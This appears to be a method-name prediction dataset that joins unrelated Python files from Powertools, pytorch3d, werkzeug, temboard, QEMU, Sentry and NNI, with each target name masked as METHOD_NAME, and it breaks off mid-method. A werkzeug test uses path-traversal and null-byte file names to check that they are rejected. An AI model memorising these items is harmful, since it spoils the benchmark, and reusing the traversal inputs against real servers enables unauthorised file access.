second_execution, _ = data_fetcher.get_lambda_response(
lambda_arn=ttl_cache_expiration_handler_fn_arn,
payload=payload,
)
second_execution_response = second_execution["Payload"].read().decode("utf-8")
    # wait 8s for the TTL to expire and execute again; this should return a new response value
sleep(8)
third_execution, _ = data_fetcher.get_lambda_response(
lambda_arn=ttl_cache_expiration_handler_fn_arn,
payload=payload,
)
third_execution_response = third_execution["Payload"].read().decode("utf-8")
# THEN
assert first_execution_response == second_execution_response
assert third_execution_response != second_execution_response
@pytest.mark.xdist_group(name="idempotency")
def test_ttl_caching_timeout_idempotency(ttl_cache_timeout_handler_fn_arn: str):
# GIVEN
payload_timeout_execution = json.dumps(
{"sleep": 5, "message": "Powertools for AWS Lambda (Python) - TTL 1s"},
sort_keys=True,
)
payload_working_execution = json.dumps(
{"sleep": 0, "message": "Powertools for AWS Lambda (Python) - TTL 1s"},
sort_keys=True,
)
# WHEN
# first call should fail due to timeout
execution_with_timeout, _ = data_fetcher.get_lambda_response(
lambda_arn=ttl_cache_timeout_handler_fn_arn,
payload=payload_timeout_execution,
raise_on_error=False,
)
execution_with_timeout_response = execution_with_timeout["Payload"].read().decode("utf-8")
# the second call should work and return the payload
execution_working, _ = data_fetcher.get_lambda_response(
lambda_arn=ttl_cache_timeout_handler_fn_arn,
payload=payload_working_execution,
)
execution_working_response = execution_working["Payload"].read().decode("utf-8")
# THEN
assert "Task timed out after" in execution_with_timeout_response
assert payload_working_execution == execution_working_response
@pytest.mark.xdist_group(name="idempotency")
def test_parallel_execution_idempotency(parallel_execution_handler_fn_arn: str):
# GIVEN
payload = json.dumps({"message": "Powertools for AWS Lambda (Python) - Parallel execution"})
invocation_options = [
GetLambdaResponseOptions(lambda_arn=parallel_execution_handler_fn_arn, payload=payload, raise_on_error=False),
GetLambdaResponseOptions(lambda_arn=parallel_execution_handler_fn_arn, payload=payload, raise_on_error=False),
]
# WHEN executing Lambdas in parallel
execution_result_list = get_lambda_response_in_parallel(invocation_options)
timeout_execution_response = execution_result_list[0][0]["Payload"].read().decode("utf-8")
error_idempotency_execution_response = execution_result_list[1][0]["Payload"].read().decode("utf-8")
# THEN
assert "Execution already in progress with idempotency key" in error_idempotency_execution_response
assert "Task timed out after" in timeout_execution_response
@pytest.mark.xdist_group(name="idempotency")
def test_idempotent_function_thread_safety(METHOD_NAME: str):
# GIVEN
payload = json.dumps({"message": "Powertools for AWS Lambda (Python) - Idempotent function thread safety check"})
# WHEN
# first execution
first_execution, _ = data_fetcher.get_lambda_response(
lambda_arn=METHOD_NAME,
payload=payload,
)
first_execution_response = first_execution["Payload"].read().decode("utf-8")
# the second execution should return the same response as the first execution
second_execution, _ = data_fetcher.get_lambda_response(
lambda_arn=METHOD_NAME,
payload=payload,
)
second_execution_response = second_execution["Payload"].read().decode("utf-8")
# THEN
    # the function threads finished without exceptions AND
    # the first and second executions are the same
for function_thread in json.loads(first_execution_response):
assert function_thread["state"] == "FINISHED"
assert function_thread["exception"] is None
assert function_thread["output"] is not None
# we use set() here because we want to compare the elements regardless of their order in the array
assert set(first_execution_response) == set(second_execution_response)
@pytest.mark.xdist_group(name="idempotency")
def test_optional_idempotency_key(optional_idempotency_key_fn_arn: str):
# GIVEN two payloads where only one has the expected idempotency key
payload = json.dumps({"headers": {"X-Idempotency-Key": "here"}})
payload_without = json.dumps({"headers": {}})
# WHEN
# we make one request with an idempotency key
first_execution, _ = data_fetcher.get_lambda_response(lambda_arn=optional_idempotency_key_fn_arn, payload=payload)
first_execution_response = first_execution["Payload"].read().decode("utf-8")
# and two others without the idempotency key
second_execution, _ = data_fetcher.get_lambda_response(
lambda_arn=optional_idempotency_key_fn_arn,
payload=payload_without,
)
second_execution_response = second_execution["Payload"].read().decode("utf-8")
third_execution, _ = data_fetcher.get_lambda_response(
lambda_arn=optional_idempotency_key_fn_arn,
payload=payload_without,
)
third_execution_response = third_execution["Payload"].read().decode("utf-8")
# THEN
# we should treat 2nd and 3rd requests with NULL idempotency key as non-idempotent transactions
# that is, no cache, no calls to persistent store, etc.
assert first_execution_response != second_execution_response
assert first_execution_response != third_execution_response
assert second_execution_response != third_execution_response | null |
save mesh | # Copyright (c) Meta Platforms, Inc. and affiliates.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree.
from collections import deque
from pathlib import Path
from typing import Deque, Optional, Union
from iopath.common.file_io import PathManager
from pytorch3d.common.datatypes import Device
from pytorch3d.structures import Meshes, Pointclouds
from .obj_io import MeshObjFormat
from .off_io import MeshOffFormat
from .pluggable_formats import MeshFormatInterpreter, PointcloudFormatInterpreter
from .ply_io import MeshPlyFormat, PointcloudPlyFormat
"""
This module has the master functions for loading and saving data.
The main usage is via the IO object, and its methods
`load_mesh`, `save_mesh`, `load_pointcloud` and `save_pointcloud`.
For example, to load a mesh you might do::
from pytorch3d.io import IO
mesh = IO().load_mesh("mymesh.obj")
and to save a point cloud you might do::
pcl = Pointclouds(...)
    IO().save_pointcloud(pcl, "output_pointcloud.ply")
"""
class IO:
"""
This class is the interface to flexible loading and saving of meshes and point clouds.
In simple cases the user will just initialize an instance of this class as `IO()`
and then use its load and save functions. The arguments of the initializer are not
usually needed.
The user can add their own formats for saving and loading by passing their own objects
to the register_* functions.
Args:
include_default_formats: If False, the built-in file formats will not be available.
Then only user-registered formats can be used.
path_manager: Used to customize how paths given as strings are interpreted.
"""
def __init__(
self,
include_default_formats: bool = True,
path_manager: Optional[PathManager] = None,
) -> None:
if path_manager is None:
self.path_manager = PathManager()
else:
self.path_manager = path_manager
self.mesh_interpreters: Deque[MeshFormatInterpreter] = deque()
self.pointcloud_interpreters: Deque[PointcloudFormatInterpreter] = deque()
if include_default_formats:
self.register_default_formats()
def register_default_formats(self) -> None:
self.register_meshes_format(MeshObjFormat())
self.register_meshes_format(MeshOffFormat())
self.register_meshes_format(MeshPlyFormat())
self.register_pointcloud_format(PointcloudPlyFormat())
def register_meshes_format(self, interpreter: MeshFormatInterpreter) -> None:
"""
Register a new interpreter for a new mesh file format.
Args:
interpreter: the new interpreter to use, which must be an instance
of a class which inherits MeshFormatInterpreter.
"""
if not isinstance(interpreter, MeshFormatInterpreter):
raise ValueError("Invalid interpreter")
self.mesh_interpreters.appendleft(interpreter)
def register_pointcloud_format(
self, interpreter: PointcloudFormatInterpreter
) -> None:
"""
Register a new interpreter for a new point cloud file format.
Args:
interpreter: the new interpreter to use, which must be an instance
of a class which inherits PointcloudFormatInterpreter.
"""
if not isinstance(interpreter, PointcloudFormatInterpreter):
raise ValueError("Invalid interpreter")
self.pointcloud_interpreters.appendleft(interpreter)
def load_mesh(
self,
path: Union[str, Path],
include_textures: bool = True,
device: Device = "cpu",
**kwargs,
) -> Meshes:
"""
Attempt to load a mesh from the given file, using a registered format.
Materials are not returned. If you have a .obj file with materials
you might want to load them with the load_obj function instead.
Args:
path: file to read
include_textures: whether to try to load texture information
device: device on which to leave the data.
Returns:
new Meshes object containing one mesh.
"""
for mesh_interpreter in self.mesh_interpreters:
mesh = mesh_interpreter.read(
path,
include_textures=include_textures,
path_manager=self.path_manager,
device=device,
**kwargs,
)
if mesh is not None:
return mesh
raise ValueError(f"No mesh interpreter found to read {path}.")
def METHOD_NAME(
self,
data: Meshes,
path: Union[str, Path],
binary: Optional[bool] = None,
include_textures: bool = True,
**kwargs,
) -> None:
"""
Attempt to save a mesh to the given file, using a registered format.
Args:
data: a 1-element Meshes
path: file to write
binary: If there is a choice, whether to save in a binary format.
include_textures: If textures are present, whether to try to save
them.
"""
if not isinstance(data, Meshes):
raise ValueError("Meshes object expected.")
if len(data) != 1:
raise ValueError("Can only save a single mesh.")
for mesh_interpreter in self.mesh_interpreters:
success = mesh_interpreter.save(
data, path, path_manager=self.path_manager, binary=binary, **kwargs
)
if success:
return
raise ValueError(f"No mesh interpreter found to write to {path}.")
def load_pointcloud(
self, path: Union[str, Path], device: Device = "cpu", **kwargs
) -> Pointclouds:
"""
Attempt to load a point cloud from the given file, using a registered format.
Args:
path: file to read
device: Device (as str or torch.device) on which to load the data.
Returns:
            new Pointclouds object containing one point cloud.
"""
for pointcloud_interpreter in self.pointcloud_interpreters:
pointcloud = pointcloud_interpreter.read(
path, path_manager=self.path_manager, device=device, **kwargs
)
if pointcloud is not None:
return pointcloud
raise ValueError(f"No point cloud interpreter found to read {path}.")
def save_pointcloud(
self,
data: Pointclouds,
path: Union[str, Path],
binary: Optional[bool] = None,
**kwargs,
) -> None:
"""
Attempt to save a point cloud to the given file, using a registered format.
Args:
data: a 1-element Pointclouds
path: file to write
binary: If there is a choice, whether to save in a binary format.
"""
if not isinstance(data, Pointclouds):
raise ValueError("Pointclouds object expected.")
if len(data) != 1:
raise ValueError("Can only save a single point cloud.")
for pointcloud_interpreter in self.pointcloud_interpreters:
success = pointcloud_interpreter.save(
data, path, path_manager=self.path_manager, binary=binary, **kwargs
)
if success:
return
raise ValueError(f"No point cloud interpreter found to write to {path}.") | null |
test object mimetype from name | import datetime
import io
import pathlib
import pytest
from werkzeug.exceptions import NotFound
from werkzeug.http import http_date
from werkzeug.test import EnvironBuilder
from werkzeug.utils import send_file
from werkzeug.utils import send_from_directory
res_path = pathlib.Path(__file__).parent / "res"
html_path = res_path / "index.html"
txt_path = res_path / "test.txt"
environ = EnvironBuilder().get_environ()
@pytest.mark.parametrize("path", [html_path, str(html_path)])
def test_path(path):
rv = send_file(path, environ)
assert rv.mimetype == "text/html"
assert rv.direct_passthrough
rv.direct_passthrough = False
assert rv.data == html_path.read_bytes()
rv.close()
def test_x_sendfile():
rv = send_file(html_path, environ, use_x_sendfile=True)
assert rv.headers["x-sendfile"] == str(html_path)
assert rv.data == b""
rv.close()
def test_last_modified():
last_modified = datetime.datetime(1999, 1, 1, tzinfo=datetime.timezone.utc)
rv = send_file(txt_path, environ, last_modified=last_modified)
assert rv.last_modified == last_modified
rv.close()
@pytest.mark.parametrize(
"file_factory", [lambda: txt_path.open("rb"), lambda: io.BytesIO(b"test")]
)
def test_object(file_factory):
rv = send_file(file_factory(), environ, mimetype="text/plain", use_x_sendfile=True)
rv.direct_passthrough = False
assert rv.data
assert rv.mimetype == "text/plain"
assert "x-sendfile" not in rv.headers
rv.close()
def test_object_without_mimetype():
with pytest.raises(TypeError, match="detect the MIME type"):
send_file(io.BytesIO(b"test"), environ)
def METHOD_NAME():
rv = send_file(io.BytesIO(b"test"), environ, download_name="test.txt")
assert rv.mimetype == "text/plain"
rv.close()
@pytest.mark.parametrize(
"file_factory", [lambda: txt_path.open(), lambda: io.StringIO("test")]
)
def test_text_mode_fails(file_factory):
with file_factory() as f, pytest.raises(ValueError, match="binary mode"):
send_file(f, environ, mimetype="text/plain")
@pytest.mark.parametrize(
("as_attachment", "value"), [(False, "inline"), (True, "attachment")]
)
def test_disposition_name(as_attachment, value):
rv = send_file(txt_path, environ, as_attachment=as_attachment)
assert rv.headers["Content-Disposition"] == f"{value}; filename=test.txt"
rv.close()
def test_object_attachment_requires_name():
with pytest.raises(TypeError, match="attachment"):
send_file(
io.BytesIO(b"test"), environ, mimetype="text/plain", as_attachment=True
)
rv = send_file(
io.BytesIO(b"test"), environ, as_attachment=True, download_name="test.txt"
)
assert rv.headers["Content-Disposition"] == "attachment; filename=test.txt"
rv.close()
@pytest.mark.parametrize(
("name", "ascii", "utf8"),
(
("index.html", "index.html", None),
(
"Ñandú/pingüino.txt",
'"Nandu/pinguino.txt"',
"%C3%91and%C3%BA%EF%BC%8Fping%C3%BCino.txt",
),
# latin-1 isn't ascii, should be quoted
("Vögel.txt", "Vogel.txt", "V%C3%B6gel.txt"),
# ":/" are not safe in filename* value
("те:/ст", '":/"', "%D1%82%D0%B5%3A%2F%D1%81%D1%82"),
# general test of extended parameter (non-quoted)
("(тест.txt", '"(.txt"', "%28%D1%82%D0%B5%D1%81%D1%82.txt"),
("(test.txt", '"(test.txt"', None),
),
)
def test_non_ascii_name(name, ascii, utf8):
rv = send_file(html_path, environ, as_attachment=True, download_name=name)
rv.close()
content_disposition = rv.headers["Content-Disposition"]
assert f"filename={ascii}" in content_disposition
if utf8:
assert f"filename*=UTF-8''{utf8}" in content_disposition
else:
assert "filename*=UTF-8''" not in content_disposition
def test_no_cache_conditional_default():
rv = send_file(
txt_path,
EnvironBuilder(
headers={"If-Modified-Since": http_date(datetime.datetime(2020, 7, 12))}
).get_environ(),
last_modified=datetime.datetime(2020, 7, 11),
)
rv.close()
assert "no-cache" in rv.headers["Cache-Control"]
assert not rv.cache_control.public
assert not rv.cache_control.max_age
assert not rv.expires
assert rv.status_code == 304
@pytest.mark.parametrize(("value", "public"), [(0, False), (60, True)])
def test_max_age(value, public):
rv = send_file(txt_path, environ, max_age=value)
rv.close()
assert ("no-cache" in rv.headers["Cache-Control"]) != public
assert rv.cache_control.public == public
assert rv.cache_control.max_age == value
assert rv.expires
assert rv.status_code == 200
def test_etag():
rv = send_file(txt_path, environ)
rv.close()
assert rv.headers["ETag"].count("-") == 2
rv = send_file(txt_path, environ, etag=False)
rv.close()
assert "ETag" not in rv.headers
rv = send_file(txt_path, environ, etag="unique")
rv.close()
assert rv.headers["ETag"] == '"unique"'
@pytest.mark.parametrize("as_attachment", (True, False))
def test_content_encoding(as_attachment):
rv = send_file(
txt_path, environ, download_name="logo.svgz", as_attachment=as_attachment
)
rv.close()
assert rv.mimetype == "image/svg+xml"
assert rv.content_encoding == ("gzip" if not as_attachment else None)
@pytest.mark.parametrize(
("directory", "path"),
[(str(res_path), "test.txt"), (res_path, pathlib.Path("test.txt"))],
)
def test_from_directory(directory, path):
rv = send_from_directory(directory, path, environ)
rv.direct_passthrough = False
assert rv.data.strip() == b"FOUND"
rv.close()
@pytest.mark.parametrize("path", ["../res/test.txt", "nothing.txt", "null\x00.txt"])
def test_from_directory_not_found(path):
with pytest.raises(NotFound):
send_from_directory(res_path, path, environ)
def test_root_path(tmp_path):
    # This is a private API; it should only be used by Flask.
d = tmp_path / "d"
d.mkdir()
(d / "test.txt").write_bytes(b"test")
rv = send_file("d/test.txt", environ, _root_path=tmp_path)
rv.direct_passthrough = False
assert rv.data == b"test"
rv.close()
rv = send_from_directory("d", "test.txt", environ, _root_path=tmp_path)
rv.direct_passthrough = False
assert rv.data == b"test"
rv.close()
def test_max_age_callable():
    # This is a private API; it should only be used by Flask.
rv = send_file(txt_path, environ, max_age=lambda p: 10)
rv.close()
assert rv.cache_control.max_age == 10 | null |
test set proc title | from __future__ import unicode_literals
from textwrap import dedent
import pytest
def test_resolve_main(mocker):
from temboardui.toolkit.proctitle import compute_main_module_name
mod = mocker.Mock(__package__='my', __name__='module')
assert 'my.module' == compute_main_module_name(mod)
mod = mocker.Mock(
__package__='my', __name__='__main__', __file__='bla/module.py')
assert 'my.module' == compute_main_module_name(mod)
def test_fix_argv(mocker):
cmmn = mocker.patch(
'temboardui.toolkit.proctitle.compute_main_module_name',
autospec=True)
from temboardui.toolkit.pycompat import PY3
from temboardui.toolkit.proctitle import fix_argv
wanted = ['python', '-m', 'my.module']
cmmn.return_value = 'my.module'
if PY3:
input_ = ['python', '-m', '-m']
else:
input_ = ['python', '-m', '-c']
assert wanted == fix_argv(input_)
wanted = ['python', 'my-script.py']
assert wanted == fix_argv(['python', 'my-script.py'])
wanted = ['python', 'my-script.py', '-c', 'config']
assert wanted == fix_argv(['python', 'my-script.py', '-c', 'config'])
wanted = ['python', '-c', '__COMMAND_STRING__']
assert wanted == fix_argv(['python', '-c', '-c'])
def test_read_memory():
import ctypes
from temboardui.toolkit.proctitle import PY3, read_byte
data = ctypes.create_string_buffer(b'abcdef')
b = read_byte(ctypes.addressof(data))
wanted = 0x61 if PY3 else b'a'
assert wanted == b
def test_walk_bytes_backwards():
import ctypes
from temboardui.toolkit.proctitle import reverse_walk_memory
data = ctypes.create_string_buffer(b'abcdef')
address_of_nul = ctypes.addressof(data) + 6
iterator = reverse_walk_memory(address_of_nul, limit=7)
out = [b for _, b in iterator]
wanted = list(b'\x00fedcba')
assert wanted == out
def test_find_nulstrings():
from temboardui.toolkit.proctitle import reverse_find_nulstring
segment = b'\x00string0\x00string1\x00'
bytes_ = ((0xbebed0d0, b) for b in reversed(segment))
iterator = reverse_find_nulstring(bytes_)
out = [b for _, b in iterator]
wanted = ['string1', 'string0']
assert wanted == out
def test_find_stack_segment():
from temboardui.toolkit.proctitle import find_stack_segment_from_maps
lines = dedent("""\
55c7c8b2d000-55c7c8b35000 r-xp 00000000 fd:01 12582915 /bin/lol
55c7c9c82000-55c7c9ca3000 rw-p 00000000 00:00 0 [heap]
7feba95d1000-7feba9766000 r-xp 00000000 fd:01 2111422 /lib/x86_64-linux-gnu/libc-2.24.so
7feba9b95000-7feba9b96000 rw-p 00000000 00:00 0
7fff737c3000-7fff737e5000 rw-p 00000000 00:00 0 [stack]
7fff737f9000-7fff737fb000 r--p 00000000 00:00 0 [vvar]
""").splitlines(True) # noqa
start, end = find_stack_segment_from_maps(lines)
assert 0x7fff737c3000 == start
assert 0x7fff737e5000 == end
with pytest.raises(Exception):
find_stack_segment_from_maps(lines=[])
def test_find_argv_from_procmaps_mod(mocker):
mod = 'temboardui.toolkit.proctitle'
fss = mocker.patch(mod + '.find_stack_segment_from_maps', autospec=True)
mocker.patch(mod + '.reverse_walk_memory', autospec=True)
rfn = mocker.patch(mod + '.reverse_find_nulstring', autospec=True)
from temboardui.toolkit.proctitle import find_argv_memory_from_maps
fss.return_value = 0xdeb, 0xf1
rfn.return_value = reversed([
        # These are the nul-terminated strings in the stack segment.
(0xbad, 'garbadge'),
(0x1c1, 'python'),
(0xbad, '-m'),
(0xbad, 'temboard.script.tool'),
(0xbad, 'LC_ALL=fr_FR.UTF-8'),
(0xbad, '/usr/lib/python3.6/site-packages/...'),
])
argv = ['python', '-m', 'temboard.script.tool']
env = dict(LC_ALL='fr_FR.UTF-8')
_, address = find_argv_memory_from_maps(maps=None, argv=argv, environ=env)
assert 0x1c1 == address
def test_find_argv_from_procmaps_command_string(mocker):
mod = 'temboardui.toolkit.proctitle'
fss = mocker.patch(mod + '.find_stack_segment_from_maps', autospec=True)
mocker.patch(mod + '.reverse_walk_memory', autospec=True)
rfn = mocker.patch(mod + '.reverse_find_nulstring', autospec=True)
from temboardui.toolkit.proctitle import find_argv_memory_from_maps
fss.return_value = 0xdeb, 0xf1
rfn.return_value = reversed([
        # These are the nul-terminated strings in the stack segment.
(0xbad, 'garbadge'),
(0x1c1, 'python'),
(0xbad, '-c'),
(0xbad, 'from module import main; main()'),
(0xbad, 'LC_ALL=fr_FR.UTF-8'),
(0xbad, '/usr/lib/python3.6/site-packages/...'),
])
argv = ['python', '-c', '__COMMAND_STRING__']
env = dict(LC_ALL='fr_FR.UTF-8')
_, address = find_argv_memory_from_maps(maps=None, argv=argv, environ=env)
assert 0x1c1 == address
def METHOD_NAME(mocker):
memmove = mocker.patch(
'temboardui.toolkit.proctitle.ctypes.memmove', autospec=True)
from temboardui.toolkit.proctitle import ProcTitleManager
setproctitle = ProcTitleManager(prefix='prefix: ')
title = setproctitle('not initialized')
assert title is None
setproctitle.address = 0xd0d0bebe
setproctitle.size = 24
memmove.reset_mock()
title = setproctitle('title')
assert title.startswith(b'prefix: title\0')
assert 24 == len(title)
assert memmove.called is True | null |
bt jmpbuf | #
# GDB debugging support
#
# Copyright 2012 Red Hat, Inc. and/or its affiliates
#
# Authors:
# Avi Kivity <[email protected]>
#
# This work is licensed under the terms of the GNU GPL, version 2
# or later. See the COPYING file in the top-level directory.
import gdb
VOID_PTR = gdb.lookup_type('void').pointer()
def get_fs_base():
'''Fetch %fs base value using arch_prctl(ARCH_GET_FS). This is
pthread_self().'''
    # %rsp - 120 is scratch space according to the System V ABI
old = gdb.parse_and_eval('*(uint64_t*)($rsp - 120)')
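    # 0x1003 is ARCH_GET_FS: arch_prctl stores the fs base (the TCB address, i.e.
    # pthread_self()) at the location given as its second argument.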
gdb.execute('call (int)arch_prctl(0x1003, $rsp - 120)', False, True)
fs_base = gdb.parse_and_eval('*(uint64_t*)($rsp - 120)')
gdb.execute('set *(uint64_t*)($rsp - 120) = %s' % old, False, True)
return fs_base
def pthread_self():
'''Fetch pthread_self() from the glibc start_thread function.'''
f = gdb.newest_frame()
while f.name() != 'start_thread':
f = f.older()
if f is None:
return get_fs_base()
try:
return f.read_var("arg")
except ValueError:
return get_fs_base()
def get_glibc_pointer_guard():
'''Fetch glibc pointer guard value'''
fs_base = pthread_self()
return gdb.parse_and_eval('*(uint64_t*)((uint64_t)%s + 0x30)' % fs_base)
def glibc_ptr_demangle(val, pointer_guard):
'''Undo effect of glibc's PTR_MANGLE()'''
return gdb.parse_and_eval('(((uint64_t)%s >> 0x11) | ((uint64_t)%s << (64 - 0x11))) ^ (uint64_t)%s' % (val, val, pointer_guard))
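# Note: on x86-64, glibc's PTR_MANGLE XORs the saved pointer with the per-thread
# pointer guard and rotates it left by 0x11 bits; the expression above applies the
# inverse (rotate right by 0x11, then XOR with the guard).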
def get_jmpbuf_regs(jmpbuf):
JB_RBX = 0
JB_RBP = 1
JB_R12 = 2
JB_R13 = 3
JB_R14 = 4
JB_R15 = 5
JB_RSP = 6
JB_PC = 7
pointer_guard = get_glibc_pointer_guard()
return {'rbx': jmpbuf[JB_RBX],
'rbp': glibc_ptr_demangle(jmpbuf[JB_RBP], pointer_guard),
'rsp': glibc_ptr_demangle(jmpbuf[JB_RSP], pointer_guard),
'r12': jmpbuf[JB_R12],
'r13': jmpbuf[JB_R13],
'r14': jmpbuf[JB_R14],
'r15': jmpbuf[JB_R15],
'rip': glibc_ptr_demangle(jmpbuf[JB_PC], pointer_guard) }
def METHOD_NAME(jmpbuf):
'''Backtrace a jmpbuf'''
regs = get_jmpbuf_regs(jmpbuf)
old = dict()
# remember current stack frame and select the topmost
# so that register modifications don't wreck it
selected_frame = gdb.selected_frame()
gdb.newest_frame().select()
for i in regs:
old[i] = gdb.parse_and_eval('(uint64_t)$%s' % i)
for i in regs:
gdb.execute('set $%s = %s' % (i, regs[i]))
gdb.execute('bt')
for i in regs:
gdb.execute('set $%s = %s' % (i, old[i]))
selected_frame.select()
def co_cast(co):
return co.cast(gdb.lookup_type('CoroutineUContext').pointer())
def coroutine_to_jmpbuf(co):
coroutine_pointer = co_cast(co)
return coroutine_pointer['env']['__jmpbuf']
class CoroutineCommand(gdb.Command):
'''Display coroutine backtrace'''
def __init__(self):
gdb.Command.__init__(self, 'qemu coroutine', gdb.COMMAND_DATA,
gdb.COMPLETE_NONE)
def invoke(self, arg, from_tty):
argv = gdb.string_to_argv(arg)
if len(argv) != 1:
gdb.write('usage: qemu coroutine <coroutine-pointer>\n')
return
METHOD_NAME(coroutine_to_jmpbuf(gdb.parse_and_eval(argv[0])))
class CoroutineBt(gdb.Command):
'''Display backtrace including coroutine switches'''
def __init__(self):
gdb.Command.__init__(self, 'qemu bt', gdb.COMMAND_STACK,
gdb.COMPLETE_NONE)
def invoke(self, arg, from_tty):
gdb.execute("bt")
if gdb.parse_and_eval("qemu_in_coroutine()") == False:
return
co_ptr = gdb.parse_and_eval("qemu_coroutine_self()")
while True:
co = co_cast(co_ptr)
co_ptr = co["base"]["caller"]
if co_ptr == 0:
break
gdb.write("Coroutine at " + str(co_ptr) + ":\n")
METHOD_NAME(coroutine_to_jmpbuf(co_ptr))
class CoroutineSPFunction(gdb.Function):
def __init__(self):
gdb.Function.__init__(self, 'qemu_coroutine_sp')
def invoke(self, addr):
return get_jmpbuf_regs(coroutine_to_jmpbuf(addr))['rsp'].cast(VOID_PTR)
class CoroutinePCFunction(gdb.Function):
def __init__(self):
gdb.Function.__init__(self, 'qemu_coroutine_pc')
def invoke(self, addr):
return get_jmpbuf_regs(coroutine_to_jmpbuf(addr))['rip'].cast(VOID_PTR) | null |
test task writes config into cache | from unittest.mock import patch, sentinel
import pytest
from django.urls import reverse
from sentry.db.postgres.transactions import in_test_hide_transaction_boundary
from sentry.relay.config import ProjectConfig
from sentry.tasks.relay import build_project_config
from sentry.testutils.hybrid_cloud import simulated_transaction_watermarks
from sentry.testutils.pytest.fixtures import django_db_all
from sentry.utils import json
@pytest.fixture(autouse=True)
def disable_auto_on_commit():
simulated_transaction_watermarks.state["default"] = -1
with in_test_hide_transaction_boundary():
yield
@pytest.fixture
def call_endpoint(client, relay, private_key, default_projectkey):
def inner(full_config, public_keys=None, global_=False):
path = reverse("sentry-api-0-relay-projectconfigs") + "?version=4"
if public_keys is None:
public_keys = [str(default_projectkey.public_key)]
body = {"publicKeys": public_keys, "no_cache": False}
if full_config is not None:
body.update({"fullConfig": full_config})
if global_ is not None:
body.update({"global": global_})
raw_json, signature = private_key.pack(body)
resp = client.post(
path,
data=raw_json,
content_type="application/json",
HTTP_X_SENTRY_RELAY_ID=relay.relay_id,
HTTP_X_SENTRY_RELAY_SIGNATURE=signature,
)
return json.loads(resp.content), resp.status_code
return inner
@pytest.fixture
def projectconfig_cache_get_mock_config(monkeypatch):
monkeypatch.setattr(
"sentry.relay.projectconfig_cache.backend.get",
lambda *args, **kwargs: {"is_mock_config": True},
)
@pytest.fixture
def globalconfig_get_mock_config(monkeypatch):
monkeypatch.setattr(
"sentry.relay.globalconfig.get_global_config",
lambda *args, **kargs: {"global_mock_config": True},
)
@pytest.fixture
def single_mock_proj_cached(monkeypatch):
def cache_get(*args, **kwargs):
if args[0] == "must_exist":
return {"is_mock_config": True}
return None
monkeypatch.setattr("sentry.relay.projectconfig_cache.backend.get", cache_get)
@pytest.fixture
def projectconfig_debounced_cache(monkeypatch):
monkeypatch.setattr(
"sentry.relay.projectconfig_debounce_cache.backend.is_debounced",
lambda *args, **kargs: True,
)
@pytest.fixture
def project_config_get_mock(monkeypatch):
monkeypatch.setattr(
"sentry.relay.config.get_project_config",
lambda *args, **kwargs: ProjectConfig(sentinel.mock_project, is_mock_config=True),
)
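# The fixtures above stub out the project-config cache, the global config, the debounce
# cache and the config computation itself, so the tests below exercise only the
# request/response handling of the project-configs endpoint.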
@django_db_all
def test_return_full_config_if_in_cache(
call_endpoint,
default_projectkey,
projectconfig_cache_get_mock_config,
globalconfig_get_mock_config,
):
result, status_code = call_endpoint(full_config=True)
assert status_code == 200
assert result == {
"configs": {default_projectkey.public_key: {"is_mock_config": True}},
"pending": [],
}
@patch(
"sentry.api.endpoints.relay.project_configs.get_global_config",
lambda *args, **kargs: {"global_mock_config": True},
)
@django_db_all
def test_return_project_and_global_config(
call_endpoint,
default_projectkey,
projectconfig_cache_get_mock_config,
):
result, status_code = call_endpoint(full_config=True, global_=True)
assert status_code == 200
assert result == {
"configs": {default_projectkey.public_key: {"is_mock_config": True}},
"pending": [],
"global": {"global_mock_config": True},
}
@django_db_all
def test_proj_in_cache_and_another_pending(
call_endpoint, default_projectkey, single_mock_proj_cached, globalconfig_get_mock_config
):
result, status_code = call_endpoint(
full_config=True, public_keys=["must_exist", default_projectkey.public_key]
)
assert status_code == 200
assert result == {
"configs": {"must_exist": {"is_mock_config": True}},
"pending": [default_projectkey.public_key],
}
@patch("sentry.tasks.relay.build_project_config.delay")
@django_db_all
def test_enqueue_task_if_config_not_cached_not_queued(
schedule_mock, call_endpoint, default_projectkey, globalconfig_get_mock_config
):
result, status_code = call_endpoint(full_config=True)
assert status_code == 200
assert result == {"configs": {}, "pending": [default_projectkey.public_key]}
assert schedule_mock.call_count == 1
@patch("sentry.tasks.relay.build_project_config.delay")
@django_db_all
def test_debounce_task_if_proj_config_not_cached_already_enqueued(
task_mock,
call_endpoint,
default_projectkey,
projectconfig_debounced_cache,
globalconfig_get_mock_config,
):
result, status_code = call_endpoint(full_config=True)
assert status_code == 200
assert result == {"configs": {}, "pending": [default_projectkey.public_key]}
assert task_mock.call_count == 0
@patch("sentry.relay.projectconfig_cache.backend.set_many")
@django_db_all
def METHOD_NAME(
cache_set_many_mock, default_projectkey, project_config_get_mock, globalconfig_get_mock_config
):
build_project_config(
public_key=default_projectkey.public_key,
update_reason="test",
)
assert cache_set_many_mock.call_count == 1
# Using a tuple because that's the format `.args` uses
assert cache_set_many_mock.call_args.args == (
{default_projectkey.public_key: {"is_mock_config": True}},
) | null |
check deduplicate by node | # Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
from typing import List, Dict, Tuple, cast
from nni.mutable.utils import uid
from nni.common.device import GPUDevice
from nni.nas.space import GraphModelSpace, Graph, Node
from .interface import AbstractOptimizer
from .logical_plan import AbstractLogicalNode, LogicalGraph, LogicalPlan, OriginNode
class DedupInputNode(AbstractLogicalNode):
"""
    This is a logical node representing a deduplicated input node.
    In ``assemble``, only one copy of the original node is returned when multiple models
    are assembled; those models then share the result of a single calculation.
"""
def __init__(self, logical_graph: LogicalGraph, node_id: int,
nodes_to_dedup: List[OriginNode], _internal=False):
super().__init__(logical_graph, node_id,
"Dedup_" + nodes_to_dedup[0].name,
nodes_to_dedup[0].operation)
self.origin_nodes: List[OriginNode] = nodes_to_dedup.copy()
self.related_models = [_.original_graph.model for _ in self.origin_nodes]
def assemble(self, multi_model_placement: Dict[GraphModelSpace, GPUDevice]) -> Tuple[Node, GPUDevice]:
for node in self.origin_nodes:
if node.original_graph.model in multi_model_placement:
new_node = Node(node.original_graph, node.id,
f'M_{node.original_graph.model.model_id}_{node.name}',
node.operation)
return new_node, multi_model_placement[node.original_graph.model]
raise ValueError(f'DedupInputNode {self.name} does not contain nodes from multi_model')
def _fork_to(self, graph: Graph):
DedupInputNode(cast(LogicalGraph, graph), self.id, self.origin_nodes)._register()
def __repr__(self) -> str:
        return f'DedupNode(id={self.id}, name={self.name}, ' \
            f'len(nodes_to_dedup)={len(self.origin_nodes)})'
class DedupInputOptimizer(AbstractOptimizer):
def __init__(self) -> None:
pass
def _check_supported_evaluator(self, evaluator):
